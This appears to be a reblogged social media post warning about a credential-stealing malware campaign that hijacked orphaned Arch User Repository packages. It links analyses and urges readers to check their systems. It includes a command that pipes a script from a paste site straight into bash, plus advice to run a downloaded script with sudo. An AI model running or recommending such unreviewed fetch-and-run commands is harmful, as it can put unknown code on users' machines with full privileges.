AUR has been hit with malware
Per the CachyOS subreddit:
"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.
I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.
This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.
The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."
There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.
Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.
Pls reblog to signal boost!!
Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:
https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency
https://ioctl.fail/preliminary-analysis-of-aur-malware/
Users can also run the following to check for malicious packages:
curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
Remember to read any scripts from online before you execute them
aur naur


























